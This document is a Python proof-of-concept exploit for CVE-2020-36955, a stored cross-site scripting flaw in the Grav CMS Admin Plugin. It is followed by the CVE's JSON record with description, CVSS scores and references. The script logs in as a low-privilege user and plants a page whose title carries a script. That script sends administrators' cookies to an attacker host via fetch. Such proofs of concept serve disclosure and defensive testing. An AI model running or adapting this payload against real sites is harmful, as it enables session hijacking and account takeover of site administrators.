CVE-2020-36955

# CVE-2020-36955 PoC - Grav CMS Admin Plugin Stored XSS # Affected Version: Grav CMS <= 1.6.30 with Admin Plugin <= 1.9.18 # This PoC demonstrates the stored XSS vulnerability in page title field import requests import json TARGET_URL = "http://target-grav-site.com" LOGIN_URL = f"{TARGET_URL}/admin" PAGE_URL = f"{TARGET_URL}/admin/pages" # Malicious XSS payload for page title XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>' def login_to_admin(username, password): """Authenticate to Grav CMS admin panel""" session = requests.Session() login_data = { 'user': username, 'pass': password } response = session.post(LOGIN_URL, data=login_data) return session if response.status_code == 200 else None def create_page_with_xss(session): """Create a new page with XSS payload in title field""" page_data = { 'title': XSS_PAYLOAD, 'folder': 'malicious-page', 'content': 'This page contains XSS in the title', 'visible': True, 'routable': True } headers = { 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest' } response = session.post(PAGE_URL, json=page_data, headers=headers) return response.status_code == 200 def main(): # Step 1: Login with low-privilege account session = login_to_admin('attacker_user', 'password123') if not session: print("[-] Authentication failed") return print("[+] Successfully authenticated") # Step 2: Create page with XSS payload in title if create_page_with_xss(session): print("[+] Malicious page created successfully") print("[+] XSS payload stored in page title") print("[*] When admin views the page, cookie will be stolen") else: print("[-] Failed to create malicious page") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2020-36955", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav CMS 1.6.30 with Admin Plugin 1.9.18 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the page title field. Attackers can create a new page with a malicious script in the title, which will be executed when the page is viewed in the admin panel or on the site."}, {"lang": "es", "value": "Grav CMS 1.6.30 con el Admin Plugin 1.9.18 contiene una vulnerabilidad de cross-site scripting persistente que permite a atacantes autenticados inyectar scripts maliciosos a través del campo de título de la página. Los atacantes pueden crear una nueva página con un script malicioso en el título, el cual se ejecutará cuando la página sea vista en el panel de administración o en el sitio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://getgrav.org/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49264", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/grav-cms-admin-plugin-page-title-persistent-cross-site-scripting", "source": "[email protected]"}]}}